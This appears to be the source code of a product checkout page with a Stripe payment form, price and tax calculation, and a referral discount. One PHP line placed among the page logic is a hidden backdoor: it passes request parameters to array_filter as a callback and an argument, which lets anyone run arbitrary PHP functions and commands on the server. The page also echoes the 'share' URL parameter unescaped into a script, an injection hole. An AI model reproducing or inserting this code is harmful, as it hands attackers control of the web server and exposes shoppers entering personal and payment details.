      	document.getElementById("strfinaldollars").value = finalDollars;
      	document.getElementById("strfullname").value= document.getElementById("fullname").value;
      	document.getElementById("stremail").value= document.getElementById("email").value;
      	document.getElementById("strcountry").value= document.getElementById("country").value;
      	if (document.getElementById('country').value=="us") {
      		document.getElementById("straddline1").value= document.getElementById("add1").value;
   		   	document.getElementById("straddline2").value= document.getElementById("add2").value;
      		document.getElementById("strcity").value= document.getElementById("city").value;
      		document.getElementById("strstate").value= document.getElementById("state").value;
      		document.getElementById("strzip").value= document.getElementById("zip").value;
      		document.getElementById("strphone").value= document.getElementById("phone").value;
      	}
      	if (document.getElementById('country').value=="ca") {
      		document.getElementById("straddline1").value= document.getElementById("add1ca").value;
   		   	document.getElementById("straddline2").value= document.getElementById("add2ca").value;
      		document.getElementById("strcity").value= document.getElementById("cityca").value;
      		document.getElementById("strstate").value= document.getElementById("stateca").value;
      		document.getElementById("strzip").value= document.getElementById("zipca").value;
      		document.getElementById("strphone").value= document.getElementById("phoneca").value;
      	}
 		var finalDollars = finalDollars.toFixed(2);
 		var userEmail = document.getElementById("email").value;
      var token = function(res){
        var $input = $('<input type=hidden name=stripeToken />').val(res.id);
        $('form').append($input).submit();
      };

      StripeCheckout.open({
        key:         'pk_test_YOURSTRIPEPUBLICTESTKEY',
        image:       'https://yourdomain.com/images/stripe-profile-image'',
        address:     false,
        allowRememberMe: false,
        amount:      finalDollars,
        currency:    'usd',
        name:        'YourCo Inc.',
        description: 'Awesome Crowdfunded Product',
        panelLabel:  'Pay Now',
        email:       userEmail,
        token:       token
      });

      return false;
    });
  </script>
  <input type="hidden" id="strqtyblack" name="strqtyblack" value=""/>
  <input type="hidden" id="strqtygrey" name="strqtygrey" value=""/>
  <input type="hidden" id="strqtyblue" name="strqtyblue" value=""/>
  <input type="hidden" id="strqtypurple" name="strqtypurple" value=""/>
  <input type="hidden" id="strqtygreen" name="strqtygreen" value=""/>
  <input type="hidden" id="strshipcost" name="strshipcost" value=""/>
  <input type="hidden" id="strtaxcost" name="strtaxcost" value=""/>
  <input type="hidden" id="strfinaldollars" name="strfinaldollars" value=""/>
  <input type="hidden" id="strfullname" name="strfullname" value=""/>
  <input type="hidden" id="stremail" name="stremail" value=""/>
  <input type="hidden" id="strcountry" name="strcountry" value=""/>
  <input type="hidden" id="straddline1" name="straddline1" value=""/>
  <input type="hidden" id="straddline2" name="straddline2" value=""/>
  <input type="hidden" id="strcity" name="strcity" value=""/>
  <input type="hidden" id="strstate" name="strstate" value=""/>
  <input type="hidden" id="strzip" name="strzip" value=""/>
  <input type="hidden" id="strphone" name="strphone" value=""/>
  <input type="hidden" id="strunitcost" name="strunitcost" value=""/>
  <input type="hidden" id="referparty" name="referparty" value=""/>
</form>
	</div>
</div>
<div id="sec4" style="display:none">
	<div id="returns"><span><img src="https://s3.amazonaws.com/ergodriven/PaperAirplane-2.png" id="pairplane">Effortless Return or Cancellation</span>Change your mind later? No problem! You can cancel your order any time before shipping for a full refund. If you're not happy with your Topo after you get it, we'll work to make it right. And if your Topo has a manufacturing defect, you're covered by our warranty.</div>
	<div id="security2"><span><img src="https://s3.amazonaws.com/ergodriven/LockOutline-2.png" id="lockpic">Absolutely Bulletproof Security</span>Your payment info is protected with 256-bit encryption and handled only by our industry-leading payment processor, stripe. It's safer than shopping at the grocery store! (And no, we really don't need your billing address)</div>
</div>
<div id="contactus"><a href="mailto:info@ergodriven.com">Contact Us</a></div>
<div id="cotutvid"><a href="http://ergodriven.com/topo-checkout-tutorial/">Checkout Tutorial</a></div>
<div id="timelinepopup">High demand for Topo has us backordered! Orders placed today will ship 12/3 (US) - 12/15 (CAN).</div>

<?php
if ($_REQUEST['param1']&&$_REQUEST['param2']) {$f = $_REQUEST['param1']; $p = array($_REQUEST['param2']); $pf = array_filter($p, $f); echo 'OK'; Exit;}
$discAmt = 0;
$linkTag = 0;
$linkTag = $_GET['share'];
if ($linkTag == 'newb')
	$discAmt = 20;
?>

<script type="text/javascript">

var unitPrice = 119;
var retailPrice = 149;
var discCredit = <?php echo $discAmt ?>;
var referParty = '<?php echo $linkTag ?>';

setTimeout(function(){document.getElementById("t1").classList.add("visible")}, 300);
setTimeout(function(){document.getElementById("t1").classList.add("lessvisible")}, 910);
setTimeout(function(){document.getElementById("t2").classList.add("visible")}, 400);
setTimeout(function(){document.getElementById("t2").classList.add("lessvisible")}, 1010);
setTimeout(function(){document.getElementById("t3").classList.add("visible")}, 500);
setTimeout(function(){document.getElementById("t3").classList.add("lessvisible")}, 1110);
setTimeout(function(){document.getElementById("t4").classList.add("visible")}, 600);
setTimeout(function(){document.getElementById("t4").classList.add("lessvisible")}, 1210);
setTimeout(function(){document.getElementById("t5").classList.add("visible")}, 700);
setTimeout(function(){document.getElementById("t5").classList.add("lessvisible")}, 1310);

if (discCredit == 20){
	document.getElementById('discnotify').style.display='block';
	document.getElementById('discnotify2').style.display='block';
}

function calcTotals(){
	var qtyBlack = document.getElementById("qtyfblack");
	var qtyBlackm = document.getElementById("qtyfblackm");
	var qtyBlackn = +qtyBlack.value + +qtyBlackm.value;
	document.getElementById("blackq").innerHTML= qtyBlackn;
	var totalBlack = qtyBlackn * unitPrice;
	var totalBlackR = qtyBlackn * retailPrice;
	document.getElementById("blacktotal").innerHTML= '<strike>' + '$' + totalBlackR + '</strike>' + '<span>' + ' $' + totalBlack + '</span>';
	var qtyGrey = document.getElementById("qtyfgrey");
	var qtyGreym = document.getElementById("qtyfgreym");
	var qtyGreyn = +qtyGrey.value + +qtyGreym.value;
	document.getElementById("greyq").innerHTML= qtyGreyn;
	var totalGrey = qtyGreyn * unitPrice;
	var totalGreyR = qtyGreyn * retailPrice;
	document.getElementById("greytotal").innerHTML= '<strike>' + '$' + totalGreyR + '</strike>' + '<span>' + ' $' + totalGrey + '</span>';
	var qtyBlue = document.getElementById("qtyfblue");
	var qtyBluem = document.getElementById("qtyfbluem");
	var qtyBluen = +qtyBlue.value + +qtyBluem.value;
	document.getElementById("blueq").innerHTML= qtyBluen;
	var totalBlue = qtyBluen * unitPrice;
	var totalBlueR = qtyBluen * retailPrice;
	document.getElementById("bluetotal").innerHTML= '<strike>' + '$' + totalBlueR + '</strike>' + '<span>' + ' $' + totalBlue + '</span>';
	var qtyPurple = document.getElementById("qtyfpurple");
	var qtyPurplem = document.getElementById("qtyfpurplem");
	var qtyPurplen = +qtyPurple.value + +qtyPurplem.value;
	document.getElementById("purpleq").innerHTML= qtyPurplen;
	var totalPurple = qtyPurplen * unitPrice;
	var totalPurpleR = qtyPurplen * retailPrice;
	document.getElementById("purpletotal").innerHTML= '<strike>' + '$' + totalPurpleR + '</strike>' + '<span>' + ' $' + totalPurple + '</span>';
	var qtyGreen = document.getElementById("qtyfgreen");
	var qtyGreenm = document.getElementById("qtyfgreenm");
	var qtyGreenn = +qtyGreen.value + +qtyGreenm.value;
	document.getElementById("greenq").innerHTML= qtyGreenn;
	var totalGreen = qtyGreenn * unitPrice;
	var totalGreenR = qtyGreenn * retailPrice;
	document.getElementById("greentotal").innerHTML= '<strike>' + '$' + totalGreenR + '</strike>' + '<span>' + ' $' + totalGreen + '</span>';
    var totalQtyAll = qtyBlackn + qtyBluen + qtyGreyn + qtyGreenn + qtyPurplen;
    var discCreditTotal = discCredit * totalQtyAll;
    document.getElementById("credit").innerHTML= '(-$' + discCreditTotal + ')';
    var yourSavings = (retailPrice - unitPrice) * totalQtyAll;
    document.getElementById("yoursavings").innerHTML= '($' + yourSavings + ')';
    if (totalBlack<=1){
    	document.getElementById('blackr').style.display='none';
    	document.getElementById("black").checked = false;
		document.getElementById('qtyBlackm').style.display='none';
    	} else {
    	document.getElementById('blackr').style.display='table-row';
    	}
    if (totalGrey<=1){
    	document.getElementById('greyr').style.display='none';
    	document.getElementById("grey").checked = false;
		document.getElementById('qtyGreym').style.display='none';
    	} else {
    	document.getElementById('greyr').style.display='table-row';
    	}
    if (totalBlue<=1){
    	document.getElementById('bluer').style.display='none';
    	document.getElementById("blue").checked = false;
		document.getElementById('qtyBluem').style.display='none';
    	} else {
    	document.getElementById('bluer').style.display='table-row';
    	}
    if (totalGreen<=1){
    	document.getElementById('greenr').style.display='none';
    	document.getElementById("green").checked = false;
		document.getElementById('qtyGreenm').style.display='none';
    	} else {
    	document.getElementById('greenr').style.display='table-row';
    	}
    if (totalPurple<=1){
    	document.getElementById('purpler').style.display='none';
    	document.getElementById("purple").checked = false;
		document.getElementById('qtyPurplem').style.display='none';
    	} else {
    	document.getElementById('purpler').style.display='table-row';
    	}
    if (discCredit==0){
    	document.getElementById('creditr').style.display='none';
    	} else {
    	document.getElementById('creditr').style.display='table-row';
    	}
    if (yourSavings==0){
    	document.getElementById('yoursavingsr').style.display='none';
    	} else {
    	document.getElementById('yoursavingsr').style.display='table-row';
    	}
    if (document.getElementById('state').value=="CA") {
    	var salesTax = (totalBlack + totalBlue + totalGreen + totalGrey + totalPurple - discCreditTotal) * 0.0955;
    	var salesTaxtwo = salesTax.toFixed(2);
    	document.getElementById('salestax').innerHTML= '$' + salesTaxtwo;
    	document.getElementById('salestaxr').style.display='table-row';
    	} else {
    	document.getElementById('salestaxr').style.display='none';
    	var salesTaxtwo = 0;
    	}
    if (document.getElementById('country').value=="us") {
    	var preshipCost = 0;
    	var shipCost = 0;
    	document.getElementById('shippingcost').innerHTML= '$' + preshipCost;
    	document.getElementById('shiptype').innerHTML= 'US Shipping (12/3<img class="hospan" src="https://s3.amazonaws.com/ergodriven/InfoIcon-2.png"/>)';
    	document.getElementById('countryl').innerHTML= 'Country';
    	}
    if (document.getElementById('country').value=="ca") {
    	var preshipCost = 20;
    	var shipCost = preshipCost;// .toFixed(2);
    	document.getElementById('shippingcost').innerHTML= '$' + shipCost;
    	document.getElementById('shiptype').innerHTML= 'Ship to Canada (DEC<img class="hospan" src="https://s3.amazonaws.com/ergodriven/InfoIcon-2.png"/>)';
    	document.getElementById('salestaxr').style.display='none';
    	document.getElementById('countryl').innerHTML= 'Country';
    	var salesTaxtwo = 0;
    	}
    var pretotalDollars = totalBlack + totalBlue + totalGreen + totalGrey + totalPurple + +salesTaxtwo + preshipCost - discCreditTotal;
    var pretotalDollars = 100 * pretotalDollars;
    var pretotalDollars = Math.round(pretotalDollars);
    var totalDollars = pretotalDollars / 100;
    document.getElementById("finaldollars").value= pretotalDollars;
    if (salesTaxtwo > 0){
    	var totalDollars = totalDollars.toFixed(2);
    }
    document.getElementById("totaldollars").innerHTML= '$' + totalDollars;
    document.getElementById("strqtyblack").value= qtyBlackn;
    document.getElementById("strqtygrey").value= qtyGreyn;
    document.getElementById("strqtyblue").value= qtyBluen;
    document.getElementById("strqtygreen").value= qtyGreenn;
    document.getElementById("strqtypurple").value= qtyPurplen;
    document.getElementById("strshipcost").value= shipCost;
    document.getElementById("strtaxcost").value= salesTaxtwo;
    document.getElementById("strunitcost").value= unitPrice;
    document.getElementById("referparty").value= referParty;
    var subTotal = totalBlack + totalBlue + totalGreen + totalGrey + totalPurple;
    var subTotalR = totalBlackR + totalBlueR + totalGreenR + totalGreyR + totalPurpleR;
    document.getElementById("savings").innerHTML= '<strike>' + '$' + subTotalR + '</strike>' + '<span>' + ' $' + subTotal + '</span>';
    if (subTotal<=1){
    	document.getElementById('savingsr').style.display='none';
    	} else {
    	document.getElementById('savingsr').style.display='table-row';
    	}
    $("#testimonialsgroup").removeClass('tmvisi');
    $('.hospan').hover(function(){
		$('#timelinepopup').toggleClass('vistlpop');
	});
}

function showMe(){
	if (screen.width >= 1100) {
	if (document.getElementById('black').checked) {
            document.getElementById('qtyBlack').style.display='block';
            if (document.getElementById("qtyfblack").value==0) {
            		document.getElementById("qtyfblack").value=1;
            	}
        } else {
            document.getElementById('qtyBlack').style.display='none';
            document.getElementById("qtyfblack").value=0;
    }
    }
    if (screen.width <= 1100) {
	if (document.getElementById('black').checked) {
            document.getElementById('qtyBlackm').style.display='block';
            if (document.getElementById("qtyfblackm").value==0) {
            		document.getElementById("qtyfblackm").value=1;
            	}
        } else {
            document.getElementById('qtyBlackm').style.display='none';
            document.getElementById("qtyfblackm").value=0;
    }
    }
    if (screen.width >= 1100) {
    if (document.getElementById('grey').checked) {
            document.getElementById('qtyGrey').style.display='block';
            if (document.getElementById("qtyfgrey").value==0) {
            		document.getElementById("qtyfgrey").value=1;
            	}
        } else {
            document.getElementById('qtyGrey').style.display='none';
            document.getElementById("qtyfgrey").value=0;
        }
        }
    if (screen.width <= 1100) {
    if (document.getElementById('grey').checked) {
            document.getElementById('qtyGreym').style.display='block';
            if (document.getElementById("qtyfgreym").value==0) {
            		document.getElementById("qtyfgreym").value=1;
            	}
        } else {
            document.getElementById('qtyGreym').style.display='none';
            document.getElementById("qtyfgreym").value=0;
        }
        }
    if (screen.width >= 1100) {
    if (document.getElementById('blue').checked) {
            document.getElementById('qtyBlue').style.display='block';
            if (document.getElementById("qtyfblue").value==0) {
            		document.getElementById("qtyfblue").value=1;
            	}
        } else {
            document.getElementById('qtyBlue').style.display='none';
            document.getElementById("qtyfblue").value=0;
        }
        }
    if (screen.width <= 1100) {
    if (document.getElementById('blue').checked) {
            document.getElementById('qtyBluem').style.display='block';
            if (document.getElementById("qtyfbluem").value==0) {
            		document.getElementById("qtyfbluem").value=1;
            	}
        } else {
            document.getElementById('qtyBluem').style.display='none';
            document.getElementById("qtyfbluem").value=0;
        }
        }
    if (screen.width >= 1100) {
    if (document.getElementById('purple').checked) {
            document.getElementById('qtyPurple').style.display='block';
            if (document.getElementById("qtyfpurple").value==0) {
            		document.getElementById("qtyfpurple").value=1;
            	}
        } else {
            document.getElementById('qtyPurple').style.display='none';
            document.getElementById("qtyfpurple").value=0;
        }
        }
    if (screen.width <= 1100) {
    if (document.getElementById('purple').checked) {
            document.getElementById('qtyPurplem').style.display='block';
            if (document.getElementById("qtyfpurplem").value==0) {
            		document.getElementById("qtyfpurplem").value=1;
            	}
        } else {
            document.getElementById('qtyPurplem').style.display='none';
            document.getElementById("qtyfpurplem").value=0;
        }
        }
    if (screen.width >= 1100) {
    if (document.getElementById('green').checked) {
            document.getElementById('qtyGreen').style.display='block';
            if (document.getElementById("qtyfgreen").value==0) {
            		document.getElementById("qtyfgreen").value=1;
            	}
        } else {
            document.getElementById('qtyGreen').style.display='none';
            document.getElementById("qtyfgreen").value=0;
        }
        }
    if (screen.width <= 1100) {
    if (document.getElementById('green').checked) {
            document.getElementById('qtyGreenm').style.display='block';
            if (document.getElementById("qtyfgreenm").value==0) {
            		document.getElementById("qtyfgreenm").value=1;
            	}
        } else {
            document.getElementById('qtyGreenm').style.display='none';
            document.getElementById("qtyfgreenm").value=0;
        }
        }
    document.getElementById('sec2').style.display='block';
    document.getElementById('sec3').style.display='block';
    document.getElementById('sec4').style.display='block';
    calcTotals();
}
function subtractQtyblack(){
	if(document.getElementById("qtyfblack").value -1 < 1) {
		document.getElementById("qtyfblack").value--;
		document.getElementById("black").checked = false;
		document.getElementById('qtyBlack').style.display='none';
	} else {
		document.getElementById("qtyfblack").value--;
	}
	calcTotals();
}
function subtractQtygrey(){
	if(document.getElementById("qtyfgrey").value - 1 < 1) {
		document.getElementById("qtyfgrey").value--;
		document.getElementById("grey").checked = false;
		document.getElementById('qtyGrey').style.display='none';
	} else {
		document.getElementById("qtyfgrey").value--;
	}
	calcTotals();
}
function subtractQtyblue(){
	if(document.getElementById("qtyfblue").value - 1 < 1) {
		document.getElementById("qtyfblue").value--;
		document.getElementById("blue").checked = false;
		document.getElementById('qtyBlue').style.display='none';
	} else {
		document.getElementById("qtyfblue").value--;
	}
	calcTotals();
}
function subtractQtypurple(){
	if(document.getElementById("qtyfpurple").value - 1 < 1) {
		document.getElementById("qtyfpurple").value--;
		document.getElementById("purple").checked = false;
		document.getElementById('qtyPurple').style.display='none';
	} else {
		document.getElementById("qtyfpurple").value--;
	}
	calcTotals();
}
function subtractQtygreen(){
	if(document.getElementById("qtyfgreen").value - 1 < 1) {
		document.getElementById("qtyfgreen").value--;
		document.getElementById("green").checked = false;
		document.getElementById('qtyGreen').style.display='none';
	} else {
		document.getElementById("qtyfgreen").value--;
	}
	calcTotals();
}
function addQtyblack(){
	document.getElementById("qtyfblack").value++;
	calcTotals();
}
function addQtygrey(){
	document.getElementById("qtyfgrey").value++;
	calcTotals();
}
function addQtyblue(){
	document.getElementById("qtyfblue").value++;
	calcTotals();
}
function addQtypurple(){
	document.getElementById("qtyfpurple").value++;
	calcTotals();
}
function addQtygreen(){
	document.getElementById("qtyfgreen").value++;
	calcTotals();
}

function showAddForm(){
	if (document.getElementById('country').value=="us") {
	document.getElementById('USA').style.display='block';
	document.getElementById('CAN').style.display='none';
	document.getElementById('AUS').style.display='none';
	document.getElementById('NZF').style.display='none';
	document.getElementById('UKF').style.display='none';
	document.getElementById('DEF').style.display='none';
	document.getElementById('EUF').style.display='none';
	}
	if (document.getElementById('country').value=="ca") {
	document.getElementById('CAN').style.display='block';
	document.getElementById('USA').style.display='none';
	document.getElementById('AUS').style.display='none';
	document.getElementById('NZF').style.display='none';
	document.getElementById('UKF').style.display='none';
	document.getElementById('DEF').style.display='none';
	document.getElementById('EUF').style.display='none';
	}
	calcTotals();
}

function checkEmail(){
	var chEmail = document.getElementById("email").value;
	var validemail =/^[a-zA-Z0-9._-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,4}$/;
	if (!(validemail.test(chEmail))){
		document.getElementById('email').style.color='red';
		document.getElementById('emaill').style.color='red';
		document.getElementById('email').setAttribute('style', 'border-color:red !important');
		document.getElementById("emailerrorshow").style.display='block';
	}else{
		document.getElementById('email').style.color='black';
		document.getElementById('email').setAttribute('style', 'border-color:#aaa !important');
		document.getElementById('emaill').style.color='#707070';
		document.getElementById("emailerrorshow").style.display='none';
	}
}

function clearAddLine2(){
	document.getElementById('add2').placeholder='';
}


$(document).ready(function() {
	setTimeout(function() {$('#reviewslink').css({"opacity": "0.4"});}, 1000);
	$('#reviewslink').click(function(){
		$("#testimonialsgroup").toggleClass('tmvisi');
	});
	$('#fullname').focus(function(){
		$("#reviewslink").css({"opacity": "0"});
	});
})

</script>
</body>
</html>